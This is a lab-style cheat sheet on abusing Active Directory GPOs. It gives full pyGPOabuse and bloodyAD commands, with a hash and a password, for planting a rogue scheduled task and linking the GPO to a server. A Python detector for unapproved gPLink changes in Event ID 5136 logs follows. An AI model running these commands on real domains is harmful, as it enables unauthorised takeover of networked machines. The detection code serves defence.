GPO (Group Policy Object)
When you own an object that owns a GPO, you can write to the GPO and link it in the domain.

Creating a rogue task for the GPO
You will need to find the GPO ID (it can be found in BloodHound).
You will need credentials for the user that controls the GPO.
Using pyGPOabuse we can create a task for the GPO:
python3 pygpoabuse.py powercorp.local/incendium -hashes :F0529918A0DE5B5B71AB9BBD915B1B01 -gpo-id 'D693F1E4-5666-4259-8BF1-E43CCE1D56F9' -f
Linking GPO
Now that we have created a rogue task, we also need to link the GPO to objects. We can do this remotely, for example by using a Python3 script:
Or we can use BloodyAD:
bloodyAD -d powercorp.local --host 10.10.1.128 -u incendium -p Incendium123 set object SRV01$ GPLink -v CN={2AADC2C9-C75F-45EF-A002-A22E1893FDB5},CN=POLICIES,CN=SYSTEM,DC=POWERCORP,DC=LOCAL
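For detection, the linking step is a write to the gPLink attribute, which domain controllers record as Event ID 5136 when Directory Service Changes auditing and a matching SACL are in place. The following added example (not part of the original page) checks such events against a baseline of approved links; the event dictionaries, the OU=Servers target, the approved GUID and the gpoadmin account are constructed assumptions.

```python
import re

# gPLink stores one "[LDAP://<GPO DN>;<options>]" entry per linked GPO.
GPLINK_ENTRY = re.compile(
    r"\[LDAP://cn=(\{[0-9a-f-]{36}\}),cn=policies,cn=system,[^;\]]*;(\d+)\]",
    re.IGNORECASE)
VALUE_ADDED = "%%14674"  # OperationType of a 5136 "Value Added" record

def parse_gplink(value):
    """Return [(GPO GUID upper-cased, link options), ...] for a gPLink value."""
    return [(g.upper(), int(o)) for g, o in GPLINK_ENTRY.findall(value or "")]

def find_unapproved_links(events, baseline, gpo_admins):
    """Flag 5136 gPLink writes that link a GPO missing from the baseline.
    baseline: {lower-cased target DN: set of approved GPO GUIDs}."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != "gplink":
            continue
        target, actor = ev["ObjectDN"].lower(), ev["SubjectUserName"].lower()
        value = (ev.get("AttributeValue") or "").strip()
        links = parse_gplink(value)
        if value and not links:  # non-empty but no well-formed entry
            alerts.append((target, actor, None, "malformed gPLink value"))
        for guid, options in links:
            if guid in baseline.get(target, set()):
                continue
            reason = "unapproved GPO link"
            if actor not in gpo_admins:
                reason += " by non-GPO-admin"
            if options & 2:  # option value 2 marks an enforced link
                reason += " (enforced)"
            alerts.append((target, actor, guid, reason))
    return alerts

# Constructed sample data: only the domain, account and ROGUE GUID are from the page.
DOMAIN = "DC=powercorp,DC=local"
APPROVED = "{11111111-2222-3333-4444-555555555555}"  # constructed baseline GPO
ROGUE = "{2AADC2C9-C75F-45EF-A002-A22E1893FDB5}"  # GUID from the link command above
def make_link(guid, opt=0):
    return f"[LDAP://cn={guid},cn=policies,cn=system,{DOMAIN};{opt}]"
def make_event(actor, value):
    return {"EventID": 5136, "OperationType": VALUE_ADDED,
            "AttributeLDAPDisplayName": "gPLink", "SubjectUserName": actor,
            "ObjectDN": f"OU=Servers,{DOMAIN}", "AttributeValue": value}
SAMPLE_EVENTS = [make_event("incendium", make_link(APPROVED) + make_link(ROGUE)),
                 make_event("gpoadmin", make_link(APPROVED))]
BASELINE = {f"ou=servers,{DOMAIN}".lower(): {APPROVED}}
```

Calling `find_unapproved_links(SAMPLE_EVENTS, BASELINE, {"gpoadmin"})` returns a single alert, for the second link written by incendium.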